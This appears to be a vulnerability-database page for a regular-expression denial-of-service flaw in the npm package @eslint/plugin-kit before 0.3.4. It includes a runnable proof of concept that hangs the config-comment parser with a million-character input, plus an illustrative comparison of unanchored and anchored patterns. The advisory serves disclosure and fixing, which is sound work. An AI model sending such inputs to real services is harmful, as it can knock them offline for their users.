An open API service providing security vulnerability metadata for many open source software ecosystems.

GSA_kwCzR0hTQS14ZmZtLWc1dzgtcXZnN84ABKSM

Low CVSS: 2.3

@eslint/plugin-kit is vulnerable to Regular Expression Denial of Service attacks through ConfigCommentParser

Affected Packages        Affected Versions   Fixed Versions
npm:@eslint/plugin-kit   < 0.3.4             0.3.4
0 Dependent packages
0 Dependent repositories
88,775,068 Downloads last month

Affected Version Ranges

All affected versions

0.1.0, 0.2.0, 0.2.1, 0.2.2, 0.2.3, 0.2.4, 0.2.5, 0.2.6, 0.2.7, 0.2.8, 0.3.1, 0.3.2, 0.3.3

All unaffected versions

0.3.4

Summary

The ConfigCommentParser#parseJSONLikeConfig API is vulnerable to a Regular Expression Denial of Service (ReDoS) attack in its only argument.

Details

The regular expression at packages/plugin-kit/src/config-comment-parser.js:158 is vulnerable to a quadratic-runtime attack because the grouped expression is not anchored: after a failed match, the engine retries from every offset inside the same run of matching characters. This can be solved by prepending the regular expression with [^-a-zA-Z0-9/].

PoC

const { ConfigCommentParser } = require("@eslint/plugin-kit");

// A long run of key characters that never reaches a ':' forces the
// unanchored pattern to retry from every offset inside the run.
const str = `${"A".repeat(1000000)}?: 1 B: 2`;

console.log("start");
const parser = new ConfigCommentParser();
console.log(parser.parseJSONLikeConfig(str));
console.log("end");

// run `npm i @eslint/[email protected]` and `node attack.js`
// then the program will be stuck forever with high CPU usage
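To illustrate the anchoring fix, here is an added example that is not code from @eslint/plugin-kit: the exact expression at line 158 is not reproduced on this page, so UNANCHORED is an assumed stand-in with the same unanchored shape, and quoteKeys, adversarialInput and growthRatio are helper names chosen for this example. It rewrites bare keys with both patterns and measures how run time grows on inputs shaped like the PoC.

```javascript
// Added example, not code from @eslint/plugin-kit. UNANCHORED is an assumed
// stand-in with the same shape as the reported pattern: it must consume a
// run of key characters and then find a ':'.
const UNANCHORED = /([-a-zA-Z0-9/]+):/g;
// Hardened form: a key may only start at the beginning of the string or
// right after a non-key character, so a failed match is not retried from
// every offset inside the same run of key characters.
const ANCHORED = /(^|[^-a-zA-Z0-9/])([-a-zA-Z0-9/]+):/g;

// Rewrite bare `key:` tokens as quoted JSON keys, e.g. `a: 1` -> `"a": 1`.
function quoteKeys(text, pattern) {
  return pattern === UNANCHORED
    ? text.replace(pattern, '"$1":')
    : text.replace(pattern, '$1"$2":');
}

// Constructed input shaped like the PoC: a run of n key characters that
// never reaches a ':' before a '?', followed by a normal rule list.
function adversarialInput(n) {
  return `${"A".repeat(n)}?: 1 B: 2`;
}

// Wall-clock time of one call, in milliseconds.
function timeMs(fn) {
  const t0 = process.hrtime.bigint();
  fn();
  return Number(process.hrtime.bigint() - t0) / 1e6;
}

// ReDoS smoke test: doubling the input should roughly double the time for
// a linear pattern and roughly quadruple it for a quadratic one.
function growthRatio(pattern, n) {
  const small = timeMs(() => quoteKeys(adversarialInput(n), pattern));
  const large = timeMs(() => quoteKeys(adversarialInput(2 * n), pattern));
  return large / Math.max(small, 0.01);
}

for (const n of [4000, 8000]) {
  console.log(`n=${n}: unanchored x${growthRatio(UNANCHORED, n).toFixed(1)}`
    + `, anchored x${growthRatio(ANCHORED, n).toFixed(1)}`);
}
```

Both patterns produce the same output on well-formed input; only their cost on a long run of key characters without a following ':' differs.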

Impact

This is a Regular Expression Denial of Service attack which may lead to blocking execution and high CPU usage.
